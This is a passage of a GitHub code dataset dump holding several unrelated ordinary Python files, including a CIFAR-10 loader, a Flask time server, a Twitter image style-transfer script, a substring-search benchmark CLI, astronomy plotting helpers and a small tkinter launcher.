dirname, f))\n imgs.append(img)\n lbls.append(lbl)\n\n # Now we flatten the arrays\n imgs = np.concatenate(imgs)\n lbls = np.concatenate(lbls)\n\n # Convert images to [0..1] range\n if normalize:\n imgs = imgs.astype(np.float32)/255.0\n if centered:\n imgs = imgs.astype(np.float32)*2. 
- 1.\n return imgs.astype(np.float32), lbls\n\ndef _get_adapted_dataset(split, label=None, centered=False, normalize=False):\n \"\"\"\n Gets the adapted dataset for the experiments\n Args : \n split (str): train or test\n label (int): int in range 0 to 9, the class/digit\n which is considered inlier; -1 keeps all classes\n normalize (bool): (Default=False) normalize data\n centered (bool): (Default=False) data centered to [-1, 1]\n Returns : \n (tuple): images and labels\n \"\"\"\n dataset = {}\n dataset['x_train'], dataset['y_train'] = _get_dataset('train',\n centered=centered,\n normalize=normalize)\n dataset['x_test'], dataset['y_test'] = _get_dataset('test', centered=centered,\n normalize=normalize)\n\n full_x_data = np.concatenate([dataset['x_train'], dataset['x_test']], axis=0)\n full_y_data = np.concatenate([dataset['y_train'], dataset['y_test']], axis=0)\n \n full_y_data[full_y_data == 10] = 0\n\n dataset['x_train'], dataset['x_test'], \\\n dataset['y_train'], dataset['y_test'] = train_test_split(full_x_data,\n full_y_data,\n test_size=0.2,\n random_state=42)\n \n dataset['x_train'], dataset['x_valid'], \\\n dataset['y_train'], dataset['y_valid'] = train_test_split(dataset['x_train'],\n dataset['y_train'],\n test_size=0.25,\n random_state=42)\n\n\n key_img = 'x_' + split\n key_lbl = 'y_' + split\n\n if label != -1:\n\n if split in ['train', 'valid']:\n\n inliers = dataset[key_img][dataset[key_lbl] == label], \\\n dataset[key_lbl][dataset[key_lbl] == label]\n outliers = dataset[key_img][dataset[key_lbl] != label], \\\n dataset[key_lbl][dataset[key_lbl] != label]\n\n dataset[key_img], dataset[key_lbl] = inliers\n\n dataset[key_lbl] = adapt_labels_outlier_task(dataset[key_lbl],\n label)\n return (dataset[key_img], dataset[key_lbl])\n else:\n dataset[key_lbl] = adapt_labels_outlier_task(dataset[key_lbl],\n label)\n\n return (dataset[key_img], dataset[key_lbl])\n","repo_name":"houssamzenati/Adversarially-Learned-Anomaly-Detection","sub_path":"data/cifar10.py","file_name":"cifar10.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":129,"dataset":"github-code","pt":"34"} +{"seq_id":"25395222729","text":"\"\"\"An implementation of a web server that shows the time in Moscow.\"\"\"\nfrom datetime import datetime, timedelta, timezone\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef time():\n \"\"\"\n Gets the current Moscow time and renders the html template's\n datetime value\n\n Returns:\n render_template(\"index.html\", datetime) : newly rendered html\n \"\"\"\n timezone_offset = 3.0 # Moscow Standard Time (UTC+03:00)\n tzinfo = timezone(timedelta(hours=timezone_offset))\n cur_time = datetime.now(tzinfo).strftime(\"%H:%M:%S\")\n\n visits = []\n with open(\"visits.txt\", \"r\", encoding=\"utf-8\") as file:\n visits = file.readlines()\n visits = visits[:100]\n visits.insert(0, str(cur_time)+' ')\n with open(\"visits.txt\", \"w\", encoding=\"utf-8\") as file:\n file.writelines(visits)\n \n return render_template(\n \"index.html\", datetime=cur_time\n )\n\n@app.route(\"/visits\")\ndef visits():\n \"\"\"Returns the recorded visit times of the root path\n\n Returns:\n str: string representation of the visit-time list\n \"\"\"\n visits = []\n with open(\"visits.txt\", \"r\", encoding=\"utf-8\") as file:\n visits = file.readlines()\n\n return str(visits)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", 
port=5000)\n","repo_name":"KamilKhairullin/Devops-course","sub_path":"app_python/myapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38147673542","text":"import tweepy\nimport pandas as pd\nimport wget\n\nimport os\nimport sys\nsys.path.append(\"fast-style-transfer/\")\nsys.path.append(\"fast-style-transfer/src\")\nfrom evaluate import ffwd_different_dimensions, ffwd\nfrom utils import list_files\nimport random\n\ndef authorize_twitter():\n auth = tweepy.OAuthHandler(os.getenv('consumer_token'), os.getenv('twitter_consumer_secret'))\n auth.set_access_token(os.getenv('twitter_key'),os.getenv('twitter_secret_key'))\n return tweepy.API(auth)\n\ndef getMilesTweets(dest_folder = 'images', registry = 'registry/downloaded_files.csv'):\n\n api = authorize_twitter()\n timeline = api.user_timeline(screen_name='@MilesSleeping')\n \n registryDF = pd.read_csv(registry)\n downloadedFiles = registryDF['file'].to_list()\n \n media_files = set()\n for status in timeline:\n media = status.entities.get('media',[])\n if(len(media) > 0):\n media_files.add((media[0]['media_url'],status.id))\n \n for media_file in media_files:\n fname = media_file[0]\n if fname not in downloadedFiles:\n print(f'downloading {fname}')\n wget.download(media_file[0],dest_folder)\n else:\n pass\n \n newFiles = pd.DataFrame(media_files, columns = ['file','tweet_id'])\n pd.concat([newFiles,registryDF]).drop_duplicates().to_csv(registry, index = False)\n return media_files\n\ndef random_style_transfer(in_path = 'images/', out_path = 'processed_images/', checkpoint_path = 'checkpoints', allow_different_dimensions = True, batch_size = 1, device = '/gpu:0'):\n checkpoints = list_files(checkpoint_path)\n files = [fname for fname in list_files(in_path) if fname not in list_files('processed_images/')]\n fullprocess = [(os.path.join(in_path,x),os.path.join(out_path,x),f'{checkpoint_path}/{random.sample(checkpoints,1)[0]}') for x in files]\n for tup in fullprocess:\n print(tup)\n if allow_different_dimensions:\n ffwd_different_dimensions([tup[0]], [tup[1]], tup[2], \n device_t=device, batch_size=batch_size)\n else :\n ffwd([tup[0]], [tup[1]], tup[2], device_t=device,\n batch_size=batch_size)","repo_name":"mj514316/miles_is_sleeping","sub_path":"miles_utils.py","file_name":"miles_utils.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"12267153947","text":"import argparse\nimport json\nimport numpy as np\nimport os\n\nfrom algorithms import aho_corasick, boyer_moore_algorithm, bruteforce\nfrom algorithms import prefix_function, pythons_find, rabin_karp_algorithm\nfrom algorithms import z_function\nfrom data_loaders import data_best, data_amorotized\nfrom statisticians.simple_statiscian import Statiscian\n\n\ndef check_arguments_first_experiment(tests_count,\n algorithms_,\n substring,\n text_filename,\n maxlength,\n ):\n algorithms_conclusion = all([algorithm in globals()\n for algorithm in algorithms_])\n if 1 <= tests_count \\\n and algorithms_conclusion \\\n and len(substring) \\\n and os.path.isfile(text_filename) \\\n and 1 <= maxlength <= 100:\n return True\n print(\"Check failed\")\n return False\n\n\ndef check_arguments_second_experiment(tests_count,\n algorithms_,\n text_filename,\n substrings_filename,\n length,\n ):\n algorithms_conclusion = all([algorithm in globals()\n for algorithm in 
algorithms_])\n if 1 <= tests_count \\\n and algorithms_conclusion \\\n and os.path.isfile(text_filename) \\\n and os.path.isfile(substrings_filename) \\\n and 1 <= length:\n return True\n print(\"Check failed\")\n return False\n\n\ndef first_experiment(parsed_arguments):\n tests_count = parsed_arguments.c\n algorithms_names = parsed_arguments.a\n text_filename = parsed_arguments.t\n substring = parsed_arguments.substring\n maxlength = parsed_arguments.maxlength\n if check_arguments_first_experiment(\n tests_count,\n algorithms_names,\n substring,\n text_filename,\n maxlength,\n ):\n results_times = []\n results_memory = []\n all_data = list(data_best.generate(maxlength,\n substring,\n text_filename,\n sparce=5_000))\n for algorithm in algorithms_names:\n algorithm_tester = globals()[algorithm].performance_testing\n results_times_of_algorithm, results_memory_of_algorithm, _ = \\\n algorithm_tester(all_data,\n tests_count,\n )\n results_times.append(np.array(results_times_of_algorithm))\n results_memory.append(np.array(results_memory_of_algorithm))\n return results_times, results_memory\n\n\ndef preparation_for_second_experiment(substrings_filename: str,\n text_filename: str,\n length: int):\n with open(text_filename) as fin:\n text = fin.read()[:length]\n with open(substrings_filename) as fin_substrings:\n for i, substring in enumerate(fin_substrings.readlines()):\n substring = substring.strip()\n save_dir = os.path.dirname(substrings_filename)\n out_filename = os.path.join(save_dir, f'substring_{i}')\n if not os.path.isfile(out_filename):\n occurences, _ = bruteforce.bruteforce(substring, text)\n with open(out_filename, 'w') as fout:\n json.dump({\n \"substring_length\": len(substring),\n \"count_of_occurences\": len(occurences),\n \"occurences\": occurences,\n }, fout)\n\n\ndef second_experiment(parsed_arguments):\n tests_count = parsed_arguments.c\n algorithms_names = parsed_arguments.a\n text_filename = parsed_arguments.t\n substrings_filename = parsed_arguments.substrings_filename\n length = parsed_arguments.length\n if check_arguments_second_experiment(\n tests_count,\n algorithms_names,\n text_filename,\n substrings_filename,\n length,\n ):\n preparation_for_second_experiment(\n substrings_filename,\n text_filename,\n length,\n )\n results_times = []\n results_memory = []\n all_data = list(data_amorotized.generate(substrings_filename,\n text_filename))\n for algorithm in algorithms_names:\n algorithm_tester = globals()[algorithm].performance_testing\n results_times_of_algorithm, results_memory_of_algorithm, _ = \\\n algorithm_tester(all_data,\n tests_count,\n )\n results_times.append(np.array(results_times_of_algorithm))\n results_memory.append(np.array(results_memory_of_algorithm))\n return results_times, results_memory\n\n\ndef create_parser():\n parser = argparse.ArgumentParser(\n description='CLI manager of the experiments executing.',\n add_help=True)\n parser.add_argument('n', action='store', type=int,\n help=\"\"\"number of the experiment.\n In current version supported only '1' or '2'\"\"\")\n parser.add_argument('c', action='store', type=int,\n help=\"\"\"how many times per algorithm experiment runs.\n As a result returned mean\"\"\")\n parser.add_argument('t', action='store',\n help=\"path to text\")\n parser.add_argument('-a', action='append', default=[\"pythons_find\"],\n help=\"\"\"a tested algorithm,\n which will be added to the list\"\"\")\n parser.add_argument('-l', action='store', dest=\"length\", type=int,\n help=\"maximum text length\")\n parser.add_argument('-s', 
action='store', dest=\"substring\",\n help=\"substring to search\")\n parser.add_argument('-m', action='store', dest=\"maxlength\", type=int,\n help=\"maximum percentage of text that can be selected\")\n parser.add_argument('-S', action='store', dest=\"substrings_filename\",\n help=\"path to substrings file\")\n parser.add_argument('--version', action='version',\n version='%(prog)s 0.2.0')\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n parsed_args = parser.parse_args()\n experiments_list = [first_experiment, second_experiment]\n if 1 <= parsed_args.n <= len(experiments_list):\n results_times, result_memory = \\\n experiments_list[parsed_args.n - 1](parsed_arguments=parsed_args)\n statiscian = Statiscian()\n if parsed_args.n == 1:\n config = {\n 'usages': {\n 'memory_usage': result_memory,\n 'running_times': results_times,\n },\n 'algorithms_names': parsed_args.a,\n 'x_label_': \"Length of input text, letters\",\n }\n statiscian.complete_statistic(config)\n elif parsed_args.n == 2:\n dir_name = os.path.dirname(parsed_args.substrings_filename)\n length_list = []\n occurences_list = []\n for substring_file in os.listdir(dir_name):\n if substring_file.startswith(\"substring_\"):\n with open(\n os.path.join(dir_name, substring_file),\n 'r',\n ) as fin:\n data = json.load(fin)\n length_list.append(data[\"substring_length\"])\n occurences_list.append(data[\"count_of_occurences\"])\n occurences_list = sorted(occurences_list,\n key=lambda x:\n length_list[occurences_list.index(x)])\n length_list.sort()\n statiscian.make_tables_time_by_many_strings(\n runing_times=np.mean(results_times, axis=2),\n occurences=occurences_list,\n substrings_lengths=length_list,\n algorithms=parsed_args.a\n )\n statiscian.make_tables_memory_by_many_strings(\n memory_usage=np.mean(result_memory, axis=2),\n occurences=occurences_list,\n substrings_lengths=length_list,\n algorithms=parsed_args.a,\n )\n","repo_name":"Vl4d1sl0veZ4r1p0v/SubstingSearchEx","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":8677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16432161655","text":"\"\"\"\nThis module consists of different plotting-related functions, \nincluding getting image cutouts and plotting them.\nIt consists of following functions:\n 1. get_image_cutout (ra_in, dec_in, **kwargs)\n 2. get_multiple_image_cutouts (ra_in, dec_in, **kwargs)\n 3. get_multiwavelength_cutouts (ra_in, dec_in, **kwargs)\n 4. plot_cutouts (imgs, Nplotmax)\n 5. 
add_lines (z, **kwargs)\n \nAuthor : Ragadeepika Pucha\nVersion : 2022 June 21\n\"\"\"\n\n####################################################################################################\n####################################################################################################\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Circle\nfrom matplotlib.backends import backend_pdf as pdf\n\nfrom astropy.table import Table\nfrom astropy.utils.data import download_file\n\nfrom urllib.error import HTTPError\n\n####################################################################################################\n####################################################################################################\n\ndef get_image_cutout(ra_in, dec_in, layername = 'ls-dr9', pixel_scale = 0.262, cutout_size = 60.):\n \"\"\"\n Function to get the image cutout from a given survey.\n Getting images for each of these surveys requires a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALEX - 'galex' - 1.5\"/pixel\n - SDSS - 'sdss' - 0.396\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutout\n \n layername : str\n String that leads to the url of the survey\n \n pixel_scale : float\n Pixel scale for the given survey in arcseconds per pixel\n \n cutout_size : float\n Size of the cutout. Default = 60\" (1 arc-minute in size)\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size may not be exactly the input value, but it will be close to it\n \n Returns\n -------\n img : 3d array\n Array containing the image cutout\n \"\"\"\n \n pixels = cutout_size/pixel_scale\n cutout_url = 'http://legacysurvey.org/viewer/jpeg-cutout/?ra=%.6f&dec=%.6f&layer='\\\n %(ra_in,dec_in)+layername+'&pixscale=%g&size=%d'%(pixel_scale, pixels)\n try:\n img = plt.imread(download_file(cutout_url,cache=False,show_progress=False,timeout=120))\n except HTTPError as e:\n if (e.code == 500):\n img = np.zeros((int(pixels), int(pixels),3))\n else:\n raise\n \n return (img)\n\n####################################################################################################\n####################################################################################################\n\ndef get_multiple_image_cutouts(ra_in, dec_in, layername = 'ls-dr9', \\\n pixel_scale = 0.262, cutout_size = 20.):\n \"\"\"\n Function to get multiple image cutouts from a given survey.\n Getting images for each of these surveys requires a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALEX - 'galex' - 1.5\"/pixel\n - SDSS - 'sdss' - 0.396\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n \n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutout\n \n layername : str\n String that leads to the url of the survey\n \n pixel_scale : float\n Pixel scale for the given survey in arcseconds per pixel\n \n cutout_size : float\n Size of the cutout. 
Default = 20\"\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size is approximately may not be the exact input value, but close to it.\n \n Returns\n -------\n imgs : list\n List of image cutouts of the input targets\n\n \"\"\"\n imgs = []\n \n N = len(ra_in)\n \n for ii in range(N):\n img = get_image_cutout(ra_in[ii], dec_in[ii], layername = layername, \\\n pixel_scale = pixel_scale, cutout_size = cutout_size)\n imgs.append(img)\n \n return (imgs)\n\n####################################################################################################\n####################################################################################################\n\ndef get_multiwavelength_cutouts(ra_in, dec_in, cutout_size = 60.):\n \"\"\"\n Function to get the list of image cutouts in order - 'GALEX', 'LS DR9', 'WISE', 'VLASS'\n Getting images for each of these surveys require a layername.\n To be consistent, we want to show the pixel scales to be similar to the ones from the survey.\n List of layernames and pixel scales for the surveys - \n - GALAX - 'galex' - 1.5\"/pixel\n - LS DR9 - 'ls-dr9' - 0.262\"/pixel\n - WISE W1/W2 - 'unwise-neo6' - 2.75\"/pixel\n - VLASS - 'vlass1.2' - 1.0\"/pixel\n \n Parameters\n ----------\n \n ra_in, dec_in : float, float\n Coordinates of the sky location for the image cutouts\n \n cutout_size : float\n The size of the cutout. Defualt = 60\" (1 arc-minute in size)\n This is used along with the pixel_scale, to calculate the number of pixels.\n Note - The number of pixels is rounded to the nearest integer. \n The final cutout size is approximately may not be the exact input value, but close to it.\n \n Returns\n -------\n \n imgs : list\n List of image cutouts in order - 'GALEX', 'LS DR9', 'WISE', 'VLASS'\n \"\"\"\n \n imgs = []\n \n layernames = np.array(['galex', 'ls-dr9', 'unwise-neo6', 'vlass1.2'])\n pixel_scales = np.array([1.5, 0.262, 2.75, 1.0])\n pixels = cutout_size/pixel_scales\n \n for index, layername in enumerate(layernames):\n img = get_image_cutout(ra_in, dec_in, layername = layername, \\\n pixel_scale = pixel_scales[index], cutout_size = cutout_size)\n imgs.append(img)\n \n return (imgs)\n\n####################################################################################################\n####################################################################################################\n\ndef plot_cutouts(imgs, Nplotmax = 80):\n \"\"\"\n Function to plot a list of given image cutouts\n \n Parameters\n ----------\n imgs : list\n List of image cutouts to plot\n Nplotmax : int\n Maximum Number of image cutouts to plot from the given list. Default = 40\n \n \"\"\"\n \n N = min([len(imgs), Nplotmax])\n Nrow = int(N/8) + 1\n \n fig = plt.figure(figsize = (16, 2*Nrow))\n \n for ii in range(N):\n ax = fig.add_subplot(Nrow, 8, ii+1)\n ax.imshow(imgs[ii])\n ax.set(xticks = [], yticks = [])\n \n plt.tight_layout()\n plt.close()\n \n return (fig)\n\n####################################################################################################\n####################################################################################################\n\ndef add_lines(z, ax = None, rest_frame = True, em_label = True,\\\n abs_label = True, em_lines = None, abs_lines = None):\n \"\"\"\n Function to add emission and/or absorption lines onto a plot. 
\n \n If em_lines or abs_lines is given, only the specified lines are plotted.\n If no lines are given, all the lines present in the x-range of the plot are plotted.\n \n Parameters\n ----------\n z : float\n Redshift value of the source\n \n ax : AxesSubplot\n The axis onto which the emission/absorption lines need to be plotted.\n If ax = None, then the function plots using plt rather than a specific axis.\n \n rest_frame : bool\n Whether or not the plot is in rest-frame. Default is True.\n \n em_label : bool\n Whether or not to label the emission lines. Default is True.\n \n abs_label : bool\n Whether or not to label the absorption lines. Default is True.\n \n em_lines : list\n List of emission lines to label\n \n abs_lines : list\n List of absorption lines to label\n \n Returns\n -------\n None\n \n \"\"\"\n \n # List of lines\n # This is the set of emission lines from the spZline files. \n # All the wavelengths are in vacuum wavelengths.\n\n # Emission Lines\n emission_lines = [\n {\"name\" : \"Ly-alpha\", \"lambda\" : 1215.67, \"emission\": True, \"label\" : \"Ly$\\\\alpha$\"},\n {\"name\" : \"N V 1240\", \"lambda\" : 1240.81, \"emission\": True, \"label\" : \"N V\"},\n {\"name\" : \"C IV 1549\", \"lambda\" : 1549.48, \"emission\": True, \"label\" : \"C IV\" },\n {\"name\" : \"He II 1640\", \"lambda\" : 1640.42, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"C III] 1908\", \"lambda\" : 1908.734, \"emission\": True, \"label\" : \"C III]\"},\n {\"name\" : \"Mg II 2799\", \"lambda\" : 2800.315, \"emission\": True, \"label\" : \"Mg II\" },\n {\"name\" : \"[O II] 3725\", \"lambda\" : 3727.092, \"emission\": True, \"label\" : \" \"},\n {\"name\" : \"[O II] 3727\", \"lambda\" : 3729.875, \"emission\": True, \"label\" : \"[O II]\"}, \n {\"name\" : \"[Ne III] 3868\", \"lambda\" : 3869.857, \"emission\": True, \"label\" : \"[Ne III]\"},\n {\"name\" : \"H-zeta\", \"lambda\" : 3890.151, \"emission\": True, \"label\" : \"H$\\\\zeta$\"},\n {\"name\" : \"[Ne III] 3970\", \"lambda\" : 3971.123, \"emission\": True, \"label\" : \"[Ne III]\"},\n {\"name\" : \"H-epsilon\", \"lambda\" : 3971.195, \"emission\": True, \"label\" : \"H$\\\\epsilon$\"}, \n {\"name\" : \"H-delta\", \"lambda\" : 4102.892, \"emission\": True, \"label\" : \"H$\\\\delta$\"},\n {\"name\" : \"H-gamma\", \"lambda\" : 4341.684, \"emission\": True, \"label\" : \"H$\\\\gamma$\"},\n {\"name\" : \"[O III] 4363\", \"lambda\" : 4364.435, \"emission\": True, \"label\" : \"[O III]\"},\n {\"name\" : \"He II 4685\", \"lambda\" : 4686.991, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"H-beta\", \"lambda\" : 4862.683, \"emission\": True, \"label\" : \"H$\\\\beta$\"},\n {\"name\" : \"[O III] 4959\", \"lambda\" : 4960.294, \"emission\": True, \"label\" : \"[O III]\" },\n {\"name\" : \"[O III] 5007\", \"lambda\" : 5008.239, \"emission\": True, \"label\" : \"[O III]\" },\n {\"name\" : \"He II 5411\", \"lambda\" : 5413.025, \"emission\": True, \"label\" : \"He II\"},\n {\"name\" : \"[O I] 5577\", \"lambda\" : 5578.888, \"emission\": True, \"label\" : \"[O I]\" },\n {\"name\" : \"[N II] 5755\", \"lambda\" : 5756.186, \"emission\": True, \"label\" : \"[N II]\" },\n {\"name\" : \"He I 5876\", \"lambda\" : 5877.308, \"emission\": True, \"label\" : \"He I\" },\n {\"name\" : \"[O I] 6300\", \"lambda\" : 6302.046, \"emission\": True, \"label\" : \"[O I]\" },\n {\"name\" : \"[S III] 6312\", \"lambda\" : 6313.806, \"emission\": True, \"label\" : \"[S III]\" },\n {\"name\" : \"[O I] 6363\", \"lambda\" : 6365.535, \"emission\": True, \"label\" 
: \"[O I]\" },\n {\"name\" : \"[N II] 6548\", \"lambda\" : 6549.859, \"emission\": True, \"label\" : \"[N II]\" },\n {\"name\" : \"H-alpha\", \"lambda\" : 6564.614, \"emission\": True, \"label\" : \"H$\\\\alpha$\" },\n {\"name\" : \"[N II] 6583\", \"lambda\" : 6585.268, \"emission\": True, \"label\" : \"[N II]\" },\n {\"name\" : \"[S II] 6716\", \"lambda\" : 6718.294, \"emission\": True, \"label\" : \"[S II]\" },\n {\"name\" : \"[S II] 6730\", \"lambda\" : 6732.678, \"emission\": True, \"label\" : \"[S II]\" },\n {\"name\" : \"[Ar III] 7135\", \"lambda\" : 7137.758, \"emission\": True, \"label\" : \"[Ar III]\" },]\n\n\n # Absorption lines\n absorption_lines = [\n {\"name\" : \"H12\", \"lambda\" : 3751.22, \"emission\": False, \"label\" : \"H12\"},\n {\"name\" : \"H11\", \"lambda\" : 3771.70, \"emission\": False, \"label\" : \"H11\"},\n {\"name\" : \"H10\", \"lambda\" : 3798.98, \"emission\": False, \"label\" : \"H10\"},\n {\"name\" : \"H9\", \"lambda\" : 3836.48, \"emission\": False, \"label\" : \"H9\"},\n {\"name\" : \"H-zeta\", \"lambda\" : 3890.151, \"emission\": False, \"label\" : \"H$\\\\zeta$\" },\n {\"name\" : \"K (Ca II 3933)\", \"lambda\" : 3934.814, \"emission\": False, \"label\" : \"K (Ca II)\"},\n {\"name\" : \"H (Ca II 3968)\", \"lambda\" : 3969.623, \"emission\": False, \"label\" : \"H (Ca II)\"},\n {\"name\" : \"H-epsilon\", \"lambda\" : 3971.195, \"emission\": False, \"label\" : \"H$\\\\epsilon$\"}, \n {\"name\" : \"H-delta\", \"lambda\" : 4102.892, \"emission\": False, \"label\" : \"H$\\\\delta$\" },\n {\"name\" : \"G (Ca I 4307)\", \"lambda\" : 4308.952, \"emission\": False, \"label\" : \"G (Ca I)\"},\n {\"name\" : \"H-gamma\", \"lambda\" : 4341.684, \"emission\": False, \"label\" : \"H$\\\\gamma$\"},\n {\"name\" : \"H-beta\", \"lambda\" : 4862.683, \"emission\": False, \"label\" : \"H$\\\\beta$\"},\n# {\"name\" : \"Mg I 5175\", \"lambda\" : 5176.441, \"emission\": False, \"label\" : \"Mg I\"},#Triplet\n {\"name\" : \"Mg I 5183\", \"lambda\" : 5185.048, \"emission\": False, \"label\" : \" \"},\n {\"name\" : \"Mg I 5172\", \"lambda\" : 5174.125, \"emission\": False, \"label\" : \" \"},\n {\"name\" : \"Mg I 5167\", \"lambda\" : 5168.762, \"emission\": False, \"label\" : \"Mg I\"},\n {\"name\" : \"D2 (Na I 5889)\", \"lambda\" : 5891.582, \"emission\": False, \"label\" : \" \" },\n {\"name\" : \"D1 (Na I 5895)\", \"lambda\" : 5897.554, \"emission\": False, \"label\" : \"D1,2 (Na I)\" },\n {\"name\" : \"H-alpha\", \"lambda\" : 6564.614, \"emission\": False, \"label\" : \"H$\\\\alpha$\"},\n ]\n \n if (ax == None):\n # If there is no axes given, plotting with the plt function\n ax = plt.gca()\n \n if (em_lines != None):\n # Choosing the emission lines listed by the user\n emission_lines = list(filter(lambda x: x['name'] in em_lines, emission_lines))\n \n if (abs_lines != None):\n # Choosing the absorption lines listed by the user\n absorption_lines = list(filter(lambda x: x['name'] in abs_lines, absorption_lines)) \n \n xbounds = ax.get_xbound() # Getting the x-range of the plot \n # This is for selecting only those lines that are visible in the x-range of the plot\n \n for ii in range(len(emission_lines)):\n # If rest_frame = False, \n # redshifting the emission lines to the observed frame of the source\n if (rest_frame == False):\n lam = emission_lines[ii]['lambda']*(1+z)\n else:\n lam = emission_lines[ii]['lambda']\n # Plotting the emission lines if they are within the x-range of the plot\n if (emission_lines[ii]['emission']) & (lam > xbounds[0]) & (lam < xbounds[1]):\n 
ax.axvline(lam, 0.95, 1.0, color = 'k', lw = 1.0)\n ax.axvline(lam, color = 'k', lw = 1.0, linestyle = ':')\n trans = ax.get_xaxis_transform()\n if (em_label == True):\n # Labeling the emission lines if em_label = True\n ax.annotate(emission_lines[ii]['label'], xy = (lam, 1.05), xycoords = trans, \\\n fontsize = 22, rotation = 90, color = 'k')\n \n for ii in range(len(absorption_lines)):\n # If rest_frame = False,\n # redshifting the absorption lines to the observed frame of the source\n if (rest_frame == False):\n lam = absorption_lines[ii]['lambda']*(1+z)\n else:\n lam = absorption_lines[ii]['lambda']\n # Plotting the absorption lines if they are within the x-range of the plot\n if (lam > xbounds[0]) & (lam < xbounds[1]):\n ax.axvline(lam, 0.2, 1.0, color = 'r', lw = 1.0, linestyle = ':')\n trans = ax.get_xaxis_transform()\n if (abs_label == True):\n # Labeling the absorption lines if abs_label = True\n ax.annotate(absorption_lines[ii]['label'], xy = (lam, 0.05), xycoords = trans, \\\n fontsize = 16, rotation = 90, color = 'r')\n\n####################################################################################################\n####################################################################################################","repo_name":"Ragadeepika-Pucha/DESI_Functions","sub_path":"py/plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":16439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6627246150","text":"from data_storages.db.core import DatabaseManager\nfrom data_storages.db.models import LessonWithAbsentChildren\n\n\nclass LessonWithAbsentChildrenRepository:\n @staticmethod\n def save(lesson_id, topic, room_num, start_date, start_time, group_id, group_name):\n\n with DatabaseManager.get_db() as session:\n lesson = LessonWithAbsentChildren(\n lesson_id=lesson_id,\n topic=topic,\n room_num=room_num,\n start_date=start_date,\n start_time=start_time,\n group_id=group_id,\n group_name=group_name,\n )\n session.add(lesson)\n session.commit()\n\n @staticmethod\n def delete_by_lesson_id(lesson_id):\n with DatabaseManager.get_db() as session:\n lesson = session.query(LessonWithAbsentChildren).filter_by(lesson_id=lesson_id).first()\n if lesson:\n session.delete(lesson)\n session.commit()\n\n @staticmethod\n def find_by_group_id_and_room_num_and_date(group_id, room_num, date):\n with DatabaseManager.get_db() as session:\n lessons = session.query(LessonWithAbsentChildren).filter(\n LessonWithAbsentChildren.group_id == group_id,\n LessonWithAbsentChildren.room_num == room_num,\n LessonWithAbsentChildren.start_date == date\n ).all()\n\n return lessons\n\n\n @staticmethod\n def find_all():\n with DatabaseManager.get_db() as session:\n lessons = session.query(LessonWithAbsentChildren).all()\n return lessons","repo_name":"stylebyhedgehog/supra-helper-bot","sub_path":"data_storages/db/repositories/lesson_with_absent_child_repository.py","file_name":"lesson_with_absent_child_repository.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31801616534","text":"\"\"\"\nReview Question 16\nParse a binary number to a decimal integer\n\"\"\"\n\n\ndef bin_to_dec(string):\n result = 0\n n = len(string)\n for i in range(n):\n result += int(string[i]) * (2 ** (n - i - 1))\n return result\n\n\ndef main():\n binary = input(\"Enter binary number\\n\")\n result = bin_to_dec(binary)\n\n 
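# e.g. bin_to_dec(\"1011\") = 1*2**3 + 0*2**2 + 1*2**1 + 1*2**0 = 11\n 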
print(f\"{binary} as decimal is {result}\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions","sub_path":"Chapter05/0022_rev16_binary_to_decimal.py","file_name":"0022_rev16_binary_to_decimal.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8826678959","text":"import tkinter as tk\nfrom gameBoardSubsystem.main import gameBoard\nfrom dbSubsystem.main import dbSubsystem\nfrom displaySubsystem.main import *\n\ndef create_checkbox_grid(rows, cols, w):\n checkbox_grid = []\n for i in range(rows):\n row = []\n for j in range(cols):\n var = tk.BooleanVar()\n checkbox = tk.Checkbutton(w, variable=var)\n checkbox.grid(row=i+1, column=j)\n row.append(var)\n checkbox_grid.append(row)\n return checkbox_grid\n\ndef launchwithconf(name):\n new_window = tk.Tk()\n new_window.title(f'inferno_launchconf -- configuring \\'{name}\\'...')\n\n label = tk.Label(new_window, text=\"Configure your new game instance: \")\n label.grid(row=0, columnspan=8)\n checkbox_grid = create_checkbox_grid(7, 8, new_window)\n button = tk.Button(new_window, text=\"LAUNCH\", command=(lambda: launch(new_window, name, board=[[int(j.get()) for j in i] for i in checkbox_grid])))\n 